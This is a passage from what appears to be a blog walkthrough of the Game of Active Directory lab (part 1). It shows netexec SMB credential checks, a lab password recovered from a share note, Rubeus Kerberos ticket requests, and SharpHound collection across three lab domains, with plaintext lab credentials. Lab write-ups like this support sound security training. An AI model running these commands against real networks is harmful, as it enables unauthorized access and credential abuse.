3 SMB 192.168.75.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)
4 SMB 192.168.75.11 445 WINTERFELL [+] north.sevenkingdoms.local\jeor.mormont:L0ngCl@w

A password hint @ CASTELBLACK.NORTH.SEVENKINGDOMS.LOCAL – Arya’s password?

Indeed, turns out to be Arya’s password, the upper case “N” seemed to show relation to password, somehow.

1  ┌──(kali㉿kali)-[~/…/modules/nxc_spider_plus/192.168.75.22/all]
2  └─$ cat arya.txt                                
3  Subject: Quick Departure
4  Hey Arya,
5  I hope this message finds you well. Something urgent has come up, and I have to leave for a while. Don't worry; I'll be back soon.
6  I left a little surprise for you in your room  the sword You've named "Needle." It felt fitting, given your skills. Take care of it, and it'll take care of you.
7  I'll explain everything when I return. Until then, stay sharp, sis.
8  Best,
9  John
                        
1  ┌──(kali㉿kali)-[~/GameOfActiveDirectory]
2  └─$ netexec smb 192.168.75.11 -u arya.stark -p Needle
3  SMB         192.168.75.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) (Null Auth:True)
4  SMB         192.168.75.11   445    WINTERFELL       [+] north.sevenkingdoms.local\arya.stark:Needle 

Running SharpHound collector on all domains using samwell.tarly’s credentials

We will run SharpHound from a non-domain joined Windows VM (Commando-VM in this case), the reason why I like to run SharpHound and not bloodhound-python script is that SharpHound has a –collectallproperties option, which is very useful in collecting more properties that are not collected by bloodhound-python, learnt this the hard way from another lab…

We can either use a runas /netonly session, or use rubeus asktgt option with /netonly to create a cmd window with a Kerberos ticket for the samwell.tarly

CMD
rubeus.exe asktgt /domain:north.sevenkingdoms.local /user:samwell.tarly /password:Heartsbane /createnetonly:c:\windows\system32\cmd.exe /show /ptt

Then in the window with valid Kerberos ticket, we can run SharpHound once for each domain

CMD
klist

Current LogonId is 0:0x13a8f165

Cached Tickets: (1)

#0>     Client: samwell.tarly @ NORTH.SEVENKINGDOMS.LOCAL
        Server: krbtgt/north.sevenkingdoms.local @ NORTH.SEVENKINGDOMS.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/7/2025 3:33:40 (local)
        End Time:   11/7/2025 13:33:40 (local)
        Renew Time: 11/14/2025 3:33:40 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
CMD
SharpHound.exe -d north.sevenkingdoms.local --collectallproperties
SharpHound.exe -d sevenkingdoms.local --collectallproperties
SharpHound.exe -d essos.local --collectallproperties
Aquiring a TGT using Rubeus and running SharpHound from a non domain-joined machine
Aquiring a TGT using Rubeus and running SharpHound from a non domain-joined machine

Recap

That’s it for part 1, as a recap:

  • We discovered 3 domain controllers.
  • Enumerated users and shares.
  • Have credentials for 4 users:
    • NORTH.SEVENKINGDOMS.LOCAL\samwell.tarly
    • NORTH.SEVENKINGDOMS.LOCAL\jeor.mormont
    • NORTH.SEVENKINGDOMS.LOCAL\arya.stark
    • SEVENKINGDOMS.LOCAL\tywin.lannister
  • Ran SharpHound collector on all 3 domains.

mo

Information Security Engineer with vast experience in a large array of devices and technologies.